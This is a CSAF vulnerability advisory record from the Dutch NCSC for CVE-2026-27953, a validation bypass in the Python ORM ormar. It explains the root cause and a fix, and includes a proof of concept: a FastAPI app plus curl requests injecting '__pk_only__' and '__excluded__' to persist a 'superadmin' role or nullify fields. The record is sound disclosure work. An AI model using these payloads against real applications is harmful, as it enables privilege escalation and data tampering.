{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-27953", "tracking": { "current_release_date": "2026-04-01T07:43:29.548680Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-27953", "initial_release_date": "2026-03-20T10:34:46.689992Z", "revision_history": [ { "date": "2026-03-20T10:34:46.689992Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T10:34:48.416659Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-20T18:18:01.730751Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (9).| CWES updated (1)." }, { "date": "2026-03-20T18:18:04.665608Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-20T18:18:38.165997Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (9).| CWES updated (1)." }, { "date": "2026-03-20T18:18:39.753339Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-20T18:38:43.782176Z", "number": "7", "summary": "Unknown change." }, { "date": "2026-03-20T21:41:15.445593Z", "number": "8", "summary": "References created (9)." }, { "date": "2026-03-20T22:07:04.157282Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T22:07:07.484000Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-21T12:44:25.080333Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (1)." }, { "date": "2026-03-28T07:40:00.956491Z", "number": "12", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-28T07:40:02.967958Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-04-01T07:43:26.413460Z", "number": "14", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products created (1)." }, { "date": "2026-04-01T07:43:26.720382Z", "number": "15", "summary": "Description removed for source.| Description created for source." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.23.1", "product": { "name": "vers:unknown/<0.23.1", "product_id": "CSAFPID-5956287", "product_identification_helper": { "cpe": "cpe:2.3:a:collerek:ormar:*:*:*:*:*:python:*:*" } } } ], "category": "product_name", "name": "ormar" } ], "category": "vendor", "name": "collerek" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-5700554" } } ], "category": "product_name", "name": "ormar" } ], "category": "product_family", "name": "bookworm" } ], "category": "vendor", "name": "debian" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.23.1", "product": { "name": "vers:unknown/<0.23.1", "product_id": "CSAFPID-5873964" } } ], "category": "product_name", "name": "ormar" } ], "category": "vendor", "name": "ormar-orm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.23.1", "product": { "name": "vers:unknown/<0.23.1", "product_id": "CSAFPID-5970948" } } ], "category": "product_name", "name": "ormar" } ], "category": "vendor", "name": "unknown" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-27953", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "notes": [ { "category": "description", "text": "### Summary\n\nA Pydantic validation bypass in `ormar`'s model constructor allows any unauthenticated user to skip **all** field validation — type checks, constraints, `@field_validator`/`@model_validator` decorators, choices enforcement, and required-field checks — by injecting `\"__pk_only__\": true` into a JSON request body. The unvalidated data is subsequently persisted to the database. This affects the **canonical usage pattern** recommended in ormar's official documentation and examples.\n\nA secondary `__excluded__` parameter injection uses the same design pattern to selectively nullify arbitrary model fields during construction.\n\n### Details\n\n**Root cause:** `NewBaseModel.__init__` ([`ormar/models/newbasemodel.py`, line 128](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L128)) pops `__pk_only__` directly from user-supplied `**kwargs` before any validation occurs:\n\n```python\n# ormar/models/newbasemodel.py, lines 128-142\npk_only = kwargs.pop(\"__pk_only__\", False) # ← extracted from user kwargs\nobject.__setattr__(self, \"__pk_only__\", pk_only)\n\nnew_kwargs, through_tmp_dict = self._process_kwargs(kwargs)\n\nif not pk_only:\n # Normal path: full Pydantic validation\n new_kwargs = self.serialize_nested_models_json_fields(new_kwargs)\n self.__pydantic_validator__.validate_python(\n new_kwargs, self_instance=self\n )\nelse:\n # Bypass path: NO validation at all\n fields_set = {self.ormar_config.pkname}\n values = new_kwargs\n object.__setattr__(self, \"__dict__\", values) # raw dict written directly\n object.__setattr__(self, \"__pydantic_fields_set__\", fields_set)\n```\n\nThe `__pk_only__` flag was designed as an internal optimization for creating lightweight FK placeholder instances in [`ormar/fields/foreign_key.py` (lines 41, 527)](https://github.com/collerek/ormar/blob/master/ormar/fields/foreign_key.py#L41). However, because it is extracted from `**kwargs` via `.pop()` with a `False` default, any external caller that passes user-controlled data to the model constructor can inject this flag.\n\n**Why the canonical FastAPI + ormar pattern is vulnerable:**\n\nOrmar's official example ([`examples/fastapi_quick_start.py`, lines 55-58](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py#L55)) recommends using ormar models directly as FastAPI request body parameters:\n\n```python\n@app.post(\"/items/\", response_model=Item)\nasync def create_item(item: Item):\n await item.save()\n return item\n```\n\nFastAPI parses the JSON body and calls `TypeAdapter.validate_python(body_dict)`, which triggers ormar's `__init__`. The `__pk_only__` key is popped at line 128 **before** Pydantic's validator inspects the data, so Pydantic never sees it — even `extra='forbid'` would not prevent this, because the key is already consumed by ormar.\n\nThe ormar Pydantic `model_config` (set in [`ormar/models/helpers/pydantic.py`, line 108](https://github.com/collerek/ormar/blob/master/ormar/models/helpers/pydantic.py#L108)) does not set `extra='forbid'`, providing no protection even in theory.\n\n**What is bypassed when `__pk_only__=True`:**\n- All type coercion and type checking (e.g., string for int field)\n- `max_length` constraints on String fields\n- `choices` constraints\n- All `@field_validator` and `@model_validator` decorators\n- `nullable=False` enforcement at the Pydantic level\n- Required-field enforcement (only `pkname` is put in `fields_set`)\n- `serialize_nested_models_json_fields()` preprocessing\n\n**Save path persists unvalidated data to the database:**\n\nAfter construction with `pk_only=True`, calling `.save()` ([`ormar/models/model.py`, lines 89-107](https://github.com/collerek/ormar/blob/master/ormar/models/model.py#L89)) reads fields directly from `self.__dict__` via `_extract_model_db_fields()`, then executes `table.insert().values(**self_fields)` — persisting the unvalidated data to the database with no re-validation.\n\n**Secondary vulnerability — `__excluded__` injection:**\n\nThe same pattern applies to `__excluded__` at [`ormar/models/newbasemodel.py`, line 292](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L292):\n\n```python\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n```\n\nAt lines 326-329, fields listed in `__excluded__` are silently set to `None`:\n\n```python\nfor field_to_nullify in excluded:\n new_kwargs[field_to_nullify] = None\n```\n\nAn attacker can inject `\"__excluded__\": [\"email\", \"password_hash\"]` to nullify arbitrary fields during construction.\n\n**Affected entry points:**\n\n| Entry Point | Exploitable? |\n|---|---|\n| `async def create_item(item: Item)` (FastAPI route) | Yes |\n| `Model.objects.create(**user_dict)` | Yes |\n| `Model(**user_dict)` | Yes |\n| `Model.model_validate(user_dict)` | Yes |\n\n### PoC\n\n**Step 1: Create a FastAPI + ormar application using the canonical pattern from ormar's docs:**\n\n```python\n# app.py\nfrom contextlib import asynccontextmanager\nimport sqlalchemy\nimport uvicorn\nfrom fastapi import FastAPI\nimport ormar\n\nDATABASE_URL = \"sqlite+aiosqlite:///test.db\"\normar_base_config = ormar.OrmarConfig(\n database=ormar.DatabaseConnection(DATABASE_URL),\n metadata=sqlalchemy.MetaData(),\n)\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n database_ = app.state.database\n if not database_.is_connected:\n await database_.connect()\n # Create tables\n engine = sqlalchemy.create_engine(DATABASE_URL.replace(\"+aiosqlite\", \"\"))\n ormar_base_config.metadata.create_all(engine)\n engine.dispose()\n yield\n database_ = app.state.database\n if database_.is_connected:\n await database_.disconnect()\n\napp = FastAPI(lifespan=lifespan)\ndatabase = ormar.DatabaseConnection(DATABASE_URL)\napp.state.database = database\n\nclass User(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"users\")\n\n id: int = ormar.Integer(primary_key=True)\n name: str = ormar.String(max_length=50)\n email: str = ormar.String(max_length=100)\n role: str = ormar.String(max_length=20, default=\"user\")\n balance: int = ormar.Integer(default=0)\n\n# Canonical ormar pattern from official examples\n@app.post(\"/users/\", response_model=User)\nasync def create_user(user: User):\n await user.save()\n return user\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n```\n\n**Step 2: Send a normal request (validation works correctly):**\n\n```bash\n# This correctly rejects — \"name\" exceeds max_length=50\ncurl -X POST http://127.0.0.1:8000/users/ \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"name\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\n \"email\": \"user@example.com\"\n }'\n# Returns: 422 Validation Error\n```\n\n**Step 3: Inject `__pk_only__` to bypass ALL validation:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"__pk_only__\": true,\n \"name\": \"\",\n \"email\": \"not-an-email\",\n \"role\": \"superadmin\",\n \"balance\": -99999\n }'\n# Returns: 200 OK — all fields persisted to database WITHOUT validation\n# - \"name\" is empty despite being required\n# - \"email\" is not a valid email\n# - \"role\" is \"superadmin\" (bypassing any validator that restricts to \"user\"/\"admin\")\n# - \"balance\" is negative (bypassing any ge=0 constraint)\n```\n\n**Step 4: Inject `__excluded__` to nullify arbitrary fields:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"__excluded__\": [\"email\", \"role\"],\n \"name\": \"attacker\",\n \"email\": \"will-be-nullified@example.com\",\n \"role\": \"will-be-nullified\"\n }'\n# Returns: 200 OK — email and role are set to NULL regardless of input\n```\n\n### Impact\n\n**Who is impacted:** Every application using ormar's canonical FastAPI integration pattern (`async def endpoint(item: OrmarModel)`) is vulnerable. This is the primary usage pattern documented in ormar's official examples and documentation.\n\n**Vulnerability type:** Complete Pydantic validation bypass.\n\n**Impact scenarios:**\n- **Privilege escalation**: If a model has a `role` or `is_admin` field with a Pydantic validator restricting values to `\"user\"`, an attacker can set `role=\"superadmin\"` by bypassing the validator\n- **Data integrity violation**: Type constraints (`max_length`, `ge`/`le`, regex patterns) are all bypassed — invalid data is persisted to the database\n- **Business logic bypass**: Custom `@field_validator` and `@model_validator` decorators (e.g., enforcing email format, age ranges, cross-field dependencies) are entirely skipped\n- **Field nullification** (via `__excluded__`): Audit fields, tracking fields, or required business fields can be selectively set to NULL\n\n**Suggested fix:**\n\nReplace `kwargs.pop(\"__pk_only__\", False)` with a keyword-only parameter that cannot be injected via `**kwargs`:\n\n```python\n# Before (vulnerable)\ndef __init__(self, *args: Any, **kwargs: Any) -> None:\n ...\n pk_only = kwargs.pop(\"__pk_only__\", False)\n\n# After (secure)\ndef __init__(self, *args: Any, _pk_only: bool = False, **kwargs: Any) -> None:\n ...\n object.__setattr__(self, \"__pk_only__\", _pk_only)\n```\n\nApply the same fix to `__excluded__`:\n\n```python\n# Before (vulnerable)\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n\n# After (secure) — pass via keyword-only _excluded parameter\ndef __init__(self, *args: Any, _pk_only: bool = False, _excluded: set | None = None, **kwargs: Any) -> None:\n ...\n # In _process_kwargs:\n excludes = _excluded or set()\n```\n\nInternal callers in `foreign_key.py` would pass `_pk_only=True` as a named argument. Keyword-only parameters prefixed with `_` cannot be injected via JSON body deserialization or `Model(**user_dict)` unpacking.", "title": "github - https://api.github.com/advisories/GHSA-f964-whrq-44h8" }, { "category": "description", "text": "ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting \"__pk_only__\": true into a JSON request body. By injecting \"__pk_only__\": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary __excluded__ parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity violations, and business logic bypass in any application using ormar.Model directly as a request body parameter. This issue has been fixed in version 0.23.1.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27953.json" }, { "category": "description", "text": "ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting \"__pk_only__\": true into a JSON request body. By injecting \"__pk_only__\": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary __excluded__ parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity violations, and business logic bypass in any application using ormar.Model directly as a request body parameter. This issue has been fixed in version 0.23.1.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27953" }, { "category": "description", "text": "ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting \"__pk_only__\": true into a JSON request body. By injecting \"__pk_only__\": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary __excluded__ parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity violations, and business logic bypass in any application using ormar.Model directly as a request body parameter. This issue has been fixed in version 0.23.1.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-27953" }, { "category": "description", "text": "Affected versions of the ormar package are vulnerable to Improper Input Validation due to internal constructor control flags being accepted from user-supplied keyword arguments. The vulnerability exists in NewBaseModel.__init__, which pops __pk_only__ and __excluded__ from **kwargs before Pydantic validation runs, allowing the normal self.__pydantic_validator__.validate_python(...) path to be skipped and permitting arbitrary fields to be set to None during _process_kwargs.", "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "other", "text": "0.00133", "title": "EPSS" }, { "category": "other", "text": "3.6", "title": "NCSC Score" }, { "category": "other", "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent CVSS (V3) score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5873964", "CSAFPID-5700554", "CSAFPID-5956287", "CSAFPID-5970948" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-f964-whrq-44h8" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27953.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27953" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-27953" }, { "category": "external", "summary": "Source - pyupio", "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/security/advisories/GHSA-f964-whrq-44h8" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-f964-whrq-44h8" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/commit/7f22aa21a7614b993970345b392dabb0ccde0ab3" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/blob/master/examples/fastapi_quick_start.py#L55" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/fields/foreign_key.py#L41" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/helpers/pydantic.py#L108" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/model.py#L89" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L128" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L292" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/ormar-orm/ormar/releases/tag/0.23.1" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27953" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5700554", "CSAFPID-5873964", "CSAFPID-5956287", "CSAFPID-5970948" ] } ], "title": "CVE-2026-27953" } ] }